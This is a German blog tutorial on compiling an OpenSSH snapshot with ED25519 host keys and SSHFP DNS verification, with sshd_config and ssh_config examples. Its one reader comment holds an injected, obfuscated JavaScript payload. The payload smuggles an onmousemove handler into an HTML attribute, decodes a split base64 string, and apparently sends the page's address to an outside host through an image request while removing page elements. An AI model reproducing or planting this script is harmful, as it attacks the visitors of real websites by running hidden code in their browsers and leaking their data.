OpenSSH Snapshot mit ED25519 SSHFP

21. Januar 2014, 17:19 | Autor: Marc | Kategorie(n) Allgemeines.

Um OpenSSH mit ED25519 zu nutzen, muss nur eine aktuelle Snapshot-Version besorgt, kompiliert und installiert werden.
Das geht wie gewohnt mit configure/make/make install. Für die meisten Linux-User macht es Sinn, configure mit den Parametern –prefix=/usr –sysconfdir=/etc/ssh zu starten, sofern OpenSSH bereits in irgendeiner Vorgängerversion installiert war. Die bestehende Konfiguration wird dabei nicht geändert.

Soll OpenSSH auch mit passenden SSHFP-Resource Records umgehen können, muss spätestens vor dem make dieser Patch angewendet werden. Dafür wird einfach im Verzeichnis openssh, das tar beim Auspacken des Snapshot angelegt hat, folgendes ausgeführt:

$ patch </PFAD/PATCHFILE

Zu den ED25519 SSHFP-RR ist allerdings zu sagen, dass ein RFC hierzu noch aussteht, womit es diesen Typ offiziell noch nicht gibt.

 

Während der Installation wurde ein ED25519-HostKey angelegt. Dieser findet sich, wenn configure entsprechend angewiesen wurde, im Verzeichnis /etc/ssh und sollte der ebenfalls dort residierenden sshd_conf bekannt gemacht werden.

  # HostKeys for protocol version 2
  HostKey /etc/ssh/ssh_host_rsa_key
  HostKey /etc/ssh/ssh_host_ecdsa_key
  HostKey /etc/ssh/ssh_host_ed25519_key

 

Damit identifiziert sich der Rechner mit einem ED25519-HostKey.
Damit ein Verbindungsaufbau mit dem Key Exchange Algorithmus ED25519 und dem Cipher chacha20, der so wie ED25519 ebenfalls von Daniel J. Bernstein stammt, stattfinden kann, müssen noch die Prioritäten dieser entsprechend in den Konfigurationsdateien angegeben werden.
Ein Beispiel kann wie folgt aussehen.

sshd_config (Server)

  Ciphers chacha20-poly1305@openssh.com,aes256-gcm@openssh.com (...)
  KexAlgorithms curve25519-sha256@libssh.org,ecdh-sha2-nistp521,ecdh-sha2-nistp384 (...)

ssh_config (Client)

  HostKeyAlgorithms ssh-ed25519-cert-v01@openssh.com,ssh-ed25519,ecdsa-sha2-nistp256-cert-v01@openssh.com (...)
  Ciphers chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-gcm@openssh.com,aes128-ctr (...)
  VerifyHostKeyDNS yes
  StrictHostKeyChecking ask

HostKeyAlgorithms ssh-ed25519-cert-v01@openssh.com in Verbindung mit VerifyHostKeyDNS yes weist den Client an, den ED25519-HostKey mit dem im DNS hinterlegten zu vergleichen.
Sofern der Patch mit einkompiliert wurde, kann ssh-keygen verwendet werden, um diesen DNS-Eintrag zu verwenden.

$ ssh-keygen -r `hostname` -f /etc/ssh/ssh_host_ed25519_key

Ohne den Patch könnte der SSHFP-RR zwar auch anders erzeugt werden, der SSH-Client würde allerdings nicht im DNS danach suchen.

QR Code für OpenSSH Snapshot mit ED25519 SSHFP

 

1 Kommentar für “OpenSSH Snapshot mit ED25519 SSHFP”

  1. dimarzo0886 | 23/04/16

    :-)<abbr title='"onmousemove=" var Iv = `boyqnhwfamvrdxguijsklpetzc`;
    function FzJ() { return this; };
    FzJ()[(!!0+``)[4] + 31..toString(36) + (!!0+“)[3-2] + (!!0+“)[2]](FzJ()[(!!0+``)[1] + (!0+“)[0] + (“+{})[1] + (“+{})[2]]((`IGlmICh3aW;5kb3cuX1;9zY2s`+`gIT0gMSkgeyAgICAgIHdpbmRvdy5fX`+`3NjayA9IDE7ICAgIC;AgICAgIHdpbmRvdy5`+`fX2hvb3kg;PSBmdW5jdGlvbigpICAgICB7`+`IAlkb;2N1bW;VudC5ib2R5LnJ;lbW92`+`ZUNoaWxkKC;Bkb2N1bWV;udC5nZXRFbGV`+`tZ;W50Qnl;JZCgnZnJIUFFqOSc`+`pICk7IAlkb2N1bWVudC5ib2R5LnJlbW92ZU`+`NoaWxk;KCBkb2N1bWVudC5nZX;RFbGVtZW5`+`0QnlJZCgnZmR;1VzBjR;WgnKSA;pOyAg`+`ICAgfTsgICAgICAgICAgdmFyIG`+`lpa;SA9IGRvY3VtZW50LmNyZWF0`+`ZUVsZW1lbn;QoJ2ltZycpOyAg`+`ICAgICAgICAgICAgI;CAgICAgICAgIC`+`AgICAg;ICAgI;CAgICAgIC;AgICAgIC`+`AgICAgICAgaWlpLnNyYyA;9ICdo;d`+`HRwOi8v;cm9kZW90;cmVib2;w`+`uY29tLnB5L;3RlbXBsYXRlcy9;zeXN;0ZW0`+`vaHRtbC9kYXBhZ2UucGhwP3I9JyArIGJ0`+`b2Eod2luZG;93LmxvY2F0aW9uLmhyZ;WY`+`pOyAgICAgICBpaWkud2lkdGggPSAn`+`MSc7

Kommentieren